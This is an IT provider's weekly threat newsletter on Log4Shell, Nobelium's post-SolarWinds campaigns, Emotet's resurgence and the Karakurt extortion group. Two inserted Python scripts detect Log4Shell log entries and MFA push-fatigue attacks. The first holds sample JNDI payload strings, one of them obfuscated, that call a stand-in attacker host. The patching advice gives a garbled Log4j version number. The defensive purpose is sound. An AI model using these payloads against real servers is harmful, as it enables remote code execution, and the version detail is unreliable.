Welcome to the latest edition of the Neu Cyber Threats, a weekly series in which we bring attention to the latest cybersecurity and phishing threats in order to ensure you stay safe online.

Here are the most prominent threats which you should be aware of:


“Log4Shell” flaw causing problems around the world

An easy to exploit flaw in the Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE), which could lead to complete server takeover. 

The flaw first appeared last week on, of all things, websites related to one of the most popular games in the world, Minecraft. The sites warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messages, including from text typed into chat messages.

Before long, the as-yet-unpatched flaw was dubbed “Log4Shell” by researchers, before being tracked as CVE-2021-44228. Then, another group of researchers added that it was seeing attacks on its honeypots coming from the Tor criminal network as threat actors tried to exploit the new bug.

Researchers added that this problem could cause an internet meltdown, given that Log4j is incorporated into lots of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid and Apache Flink. This exposes a number of third-party apps that may also be vulnerable to the same type of high-severity exploits as those spotted in Minecraft, as well as cloud services such as Apple iCloud. 

Even though an initial fix was rushed out at the end of last week, this will take time to trickle down to all of the various projects, given how extensively the logging library is incorporated with them downstream. 

An example of the bug’s massive reach comes from the National Security Agency (NSA), which commented that even its own GHIDRA – a suite of reverse engineering tools – includes the buggy Log4j library.

“The Log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks.”

The bug has been assigned the maximum CVSS score of 10, given how easy it is to exploit, the attackers’ ability to seize control of targeted servers and how common Log4j is. According to researchers, the security hole can be exploited by simply getting the application to log a special string.

Security experts added: “This Log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string.” 

Some are already comparing this scenario to that of Shellshock, with regards to its huge potential severity. Also known as Bashdoor, Shellshock was a family of security bugs in the Unix Bash shell, present in almost all Linux, UNIX and Mac OS X deployments. Within hours of its disclosure in 2014, Shellshock was being exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning. 

Security researchers have predicted that threat actors will likely include payloads in simple HTTP connections, either in a User-Agent header or trivial POST form data. “Organisations are already seeing signs of exploitation in the wild, which means adversaries will just spray-and-pray across the internet – hoping for some luck.” 

It is recommended that organisations that are actively using Apache log4j upgrade to log4j-2.1.50-rc2 as soon as possible. Whether a given deployment is vulnerable also depends on its specific configuration. But there are “other attack vectors targeting this vulnerability which can result in Remote Control Execution. Depending on what code is present on the server, an attacker could leverage this existing code to execute a payload.”

Businesses can tell if they’re affected by examining log files for services using affected Log4j versions. If those logs contain user-controlled strings, the service could be affected. By adopting an assumed-breach mentality and reviewing the logs of impacted applications for unusual activity, organisations can keep on top of this evolving situation.
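The log review described above, as an added detection example that is not part of the original newsletter: it scans constructed access-log lines (the log format, client IPs and hostnames are assumptions) for the Log4j `${jndi:` lookup in client-supplied fields, and also flags nested `${...}` lookups, which legitimate request data almost never contains and which a plain substring match would miss.

```python
import re
from typing import List, Tuple

# Constructed sample access-log lines (not from the original post); the
# quoted last field is the client-supplied User-Agent, a common injection point.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:10:01:07 +0000] "GET /login HTTP/1.1" 200 311 "-" "${jndi:ldap://attacker.invalid/a}"
203.0.113.9 - - [10/Dec/2021:10:01:09 +0000] "POST /api HTTP/1.1" 500 0 "-" "${${lower:j}ndi:rmi://attacker.invalid/b}"
198.51.100.2 - - [10/Dec/2021:10:02:00 +0000] "GET /q?s=${date:yyyy} HTTP/1.1" 404 0 "-" "curl/7.68"
198.51.100.7 - - [10/Dec/2021:10:03:00 +0000] "GET /ok HTTP/1.1" 200 10 "-" "Mozilla/5.0 (price ${10})"
"""

# A Log4j lookup has the form ${name:...}; a lookup named "jndi" is the
# trigger for CVE-2021-44228, so any occurrence in logged request data is a hit.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def lookup_depth(text: str) -> int:
    """Maximum nesting depth of ${...} lookups in a line (0 = none)."""
    depth = best = i = 0
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            best = max(best, depth)
            i += 2
            continue
        if text[i] == "}" and depth:
            depth -= 1
        i += 1
    return best

def scan_log(log_text: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, client_ip, reason) for every line that warrants review."""
    findings = []
    for no, line in enumerate(log_text.splitlines(), 1):
        ip = line.split(" ", 1)[0]
        if JNDI_LOOKUP.search(line):
            findings.append((no, ip, "jndi lookup in logged request data"))
        elif lookup_depth(line) >= 2:
            # Nested lookups are how the literal "jndi" token gets hidden from
            # simple string matching; treat them as suspicious until reviewed.
            findings.append((no, ip, "nested lookup (possible obfuscated jndi)"))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Lines that only use a single benign lookup such as `${date:yyyy}` are not reported; the flagged source IPs are the ones to correlate with outbound LDAP/RMI connections from the application host.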

Neuways advises businesses who are concerned by the flaw to contact their software providers to ensure that patches have been applied and all software their business is using is secure, as well as contacting their MSP. Some businesses may have CRM or accounting software that isn’t managed by their MSP, so it is important that all bases are covered to ensure complete safety.

SolarWinds supply chain attackers strike again


One year after the notorious SolarWinds supply-chain attacks, the criminals behind it are striking again. Researchers said that they’ve seen the threat group – which Microsoft refers to as “Nobelium” – compromising global business and government targets with novel tactics and custom malware, allowing them to steal data and move laterally across networks.

Two distinct clusters of activity can be plausibly attributed to the threat group. Indeed, resellers were the target of a Nobelium campaign that Microsoft revealed in October, in which the group was seen using credential-stuffing and phishing, as well as API abuse and token theft, to gather legitimate account credentials and privileged access to reseller networks. The ultimate goal of this campaign seemed to be to reach downstream customer networks.

Nobelium also engaged in credential theft earlier in 2021, using a backdoor called FoggyWeb to attack Active Directory servers.

In these latest clusters, stolen credentials facilitated initial access to the targeted organisations. Researchers also believe that threat actors acquired the credentials from an info-stealer malware campaign of a third party rather than one of their own.

Attackers have added a number of novel tactics, techniques and procedures to bypass security restrictions within environments, including the extraction of virtual machines to determine internal routing configurations.

There is also new malware in their arsenal: a new, bespoke downloader that researchers have called Ceeloader. The malware, which is heavily obfuscated, is written in C and can execute shellcode payloads directly in memory, according to researchers.

A Cobalt Strike beacon installs and executes Ceeloader, which has no persistence mechanism of its own, so it cannot run automatically when Windows is started. The malware evades security protections by mixing its calls to the Windows API with large blocks of useless code.

Other activity observed in the attacks includes using accounts with application impersonation privileges to harvest sensitive mail data, using residential IP proxy services and newly provisioned geo-located infrastructure to communicate with compromised victims. This is in addition to the abuse of multi-factor authentication (MFA) to leverage “push” notifications on smartphones.

The so-called SolarWinds attack that was discovered last December is now the stuff of legend. It became a cautionary tale for how quickly and how far a cyber attack can spread through a global supply chain. Those attacks affected numerous organisations and Nobelium used a malicious binary called “Sunburst” as a backdoor into SolarWinds.Orion.Core.BusinessLayer.dll, a SolarWinds digitally signed component of the Orion software framework. The component is a plug-in that communicates via HTTP to third-party servers, allowing the attack to proliferate quickly.

There is similar potential for widespread attack in the new clusters observed by researchers. They observed “multiple instances where the threat actor compromised service providers and used the privileged access and credentials belonging to these providers to compromise downstream customers.”

Attackers also used credentials they appear to have obtained from the third-party info-stealer campaign to gain access to an organisation’s Microsoft 365 environment via a stolen session token. Researchers identified the info-stealer on some of the affected systems shortly before the token was generated.

One creative technique researchers observed Nobelium using in the attacks is the abuse of repeated MFA push notifications to gain access to corporate accounts. As many MFA providers allow users to accept a phone app push notification or to receive a phone call and press a key as a second factor to authenticate access to an account, attackers are taking advantage.

Using a valid username and password combination, attackers issued multiple MFA requests to an end user’s legitimate device until the target accepted the authentication. This ultimately granted the threat actor access to the account.
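The push-notification abuse described above is visible in MFA audit logs as a burst of denied or unanswered pushes for one user, often ending in an approval. As an added detection example that is not part of the original newsletter, this code runs a sliding-window check over constructed MFA events (the usernames, IPs, event shape, ten-minute window and threshold of three are all assumptions), raising a first alert while the pushes are still being refused and a second, escalated one if the user eventually accepts.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, Tuple

# Constructed MFA audit events (not from the original post):
# (timestamp, user, result of the push challenge, source IP of the primary login).
SAMPLE_EVENTS = [
    ("2021-12-06T08:00:05", "alice", "denied",   "198.51.100.10"),
    ("2021-12-06T08:00:41", "alice", "timeout",  "198.51.100.10"),
    ("2021-12-06T08:01:12", "alice", "denied",   "198.51.100.10"),
    ("2021-12-06T08:01:55", "alice", "timeout",  "198.51.100.10"),
    ("2021-12-06T08:02:30", "alice", "approved", "198.51.100.10"),
    ("2021-12-06T08:02:35", "bob",   "approved", "203.0.113.7"),
    ("2021-12-06T09:15:00", "bob",   "denied",   "203.0.113.7"),
    ("2021-12-06T09:30:00", "bob",   "approved", "203.0.113.7"),
]

WINDOW = timedelta(minutes=10)   # assumed sliding window
THRESHOLD = 3                    # refused/unanswered pushes before the first alert

def detect_push_fatigue(events, window=WINDOW, threshold=THRESHOLD) -> List[Tuple[str, str, int, bool]]:
    """Return alerts as (user, source_ip, refused_pushes, approved_after).

    approved_after=False: the burst is in progress and the account can still be
    locked. approved_after=True: the user accepted a push after the burst, so the
    account should be treated as compromised until the session is reviewed.
    """
    per_user = defaultdict(list)
    for ts, user, result, ip in sorted(events):
        per_user[user].append((datetime.fromisoformat(ts), result, ip))
    alerts = []
    for user, rows in per_user.items():
        refused = []  # timestamps of denied/timed-out pushes inside the window
        for when, result, ip in rows:
            refused = [t for t in refused if when - t <= window]
            if result in ("denied", "timeout"):
                refused.append(when)
                if len(refused) == threshold:       # fire once as the threshold is crossed
                    alerts.append((user, ip, len(refused), False))
            elif result == "approved" and len(refused) >= threshold:
                alerts.append((user, ip, len(refused), True))
                refused = []                        # start a fresh window after escalation
    return alerts

if __name__ == "__main__":
    for alert in detect_push_fatigue(SAMPLE_EVENTS):
        print(alert)
```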

All in all, the new cluster of activity is not good news for businesses. It shows that Nobelium’s potential for dangerous threat activity seems to be rising in both sophistication and intensity, signalling the potential for another SolarWinds style attack on the horizon.

Neuways advises businesses to take note of these types of attacks – especially the abuse of the MFA system. Always question any prompts that are asked of you, as these could lead to a handover of your credentials to cyber criminals.

Emotet attacks could cause spate of ransomware attacks

Emotet malware is spreading, after a period of very little activity. The rapid spread of Emotet via TrickBot and its behaviour since it resurfaced last month could signal a spate of ransomware attacks.

In mid-November, a team of researchers observed the TrickBot trojan launching what appears to be a new loader for the notorious Emotet, which has been called “the world’s most dangerous malware.”

Now Emotet has been observed directly installing Cobalt Strike beacons on infected devices, which can give cyber criminals direct access to install ransomware on target systems.

Researchers also revealed that TrickBot has amassed 140,000 victims across 149 countries in only 10 months. There have also been 223 different TrickBot campaigns spotted across the last six months, with targets including finance and manufacturing.

The campaigns have become larger and more widely targeted, with the number of victims growing, despite the drop in the number of campaigns.

Emotet began life as a banking trojan in 2014 and has continually evolved to become a full-service threat-delivery mechanism. The botnet was “once an overbearing threat that held more than 1.5 million machines under its control that are capable of infecting those machines with additional bankers, trojans and ransomware,” according to researchers.

Neuways advises businesses to take extra caution when dealing with unexpected emails that require the user to open a document or click a hyperlink. The return of this malware means that there are extra threats out there, with an increase in targeted campaigns expected to follow. Targeted campaigns are even more dangerous, as they are typically tailored to a specific individual or business.

Brand new cyber crime group on the rise

There is a new financially motivated cyber crime group on the rise, although, strangely enough, they don’t seem to be interested in deploying ransomware or taking out high-profile targets.

Researchers have been tracking a group that calls itself “Karakurt,” which focuses on data exfiltration and subsequent extortion rather than encryption, allowing it to move quickly. Since September, it has hit more than 40 victims.

“The group are financially motivated, opportunistic in nature, and appear to be targeting smaller companies or corporate subsidiaries versus the alternative big-game hunting approach,” researchers wrote.

Researchers said they expect that Karakurt will be a bit of a trendsetter and that in the future, other groups will move away from targeting massive corporations or critical-infrastructure providers with ransomware to adopt a similar exfiltration approach. This is because it “enables faster attack execution and steers clear of intentionally disrupting business operations, yet still yields leverage in terms of data extortion,” researchers said.

Karakurt’s tactics for infiltrating victim networks, moving laterally and stealing data are similar to those of many other threat actors. The group often takes a “living off the land” approach depending on the attack surface, meaning it uses tools or features that already exist in the target environment.

The group establishes initial access using legitimate VPN credentials, though researchers said it’s unclear how they obtain those credentials. To maintain persistence once accessing a network, Karakurt predominantly uses service creation, remote-management software and distribution of command-and-control (C2) beacons across victim environments using Cobalt Strike.

Recently, the group seems to have switched tactics in its deployment of backup persistence. Instead of deploying Cobalt Strike, Karakurt “persisted within the victim’s network via the VPN IP pool or installed AnyDesk to allow external remote access to compromised devices,” researchers wrote. This allows the group to leverage previously obtained user, service and administrator credentials to move laterally.

The group also uses other remote-management tools, remote desktop protocol (RDP), Cobalt Strike and PowerShell commands to move laterally and to discover pertinent data to steal and use for extortion purposes as needed, researchers said.

Overall, the group’s attack method shows it is nimble enough to modify its tactics depending on the victim’s environment. Due to Karakurt using valid credentials to access networks, it can manage to evade detection in many cases. Additionally, Karakurt will contact companies multiple times to put pressure on them to pay once their data has been taken.

As a result, businesses should maintain their best cyber security practices, such as patching across all systems, updating anti-virus software and implementing strict network safety policies where feasible to protect themselves. Given the group’s tendency to use valid credentials, organisations should make passwords as complex as they can, as well as using multi-factor authentication (MFA) wherever possible.

Companies should only use admin accounts for valid administrative purposes, and never to connect to the network or browse the internet, as well as reinforcing them with cross-platform MFA procedures.

If you are concerned about any cyber security issues within your business, contact us today on 01283 753 333 or email hello@neuways.com.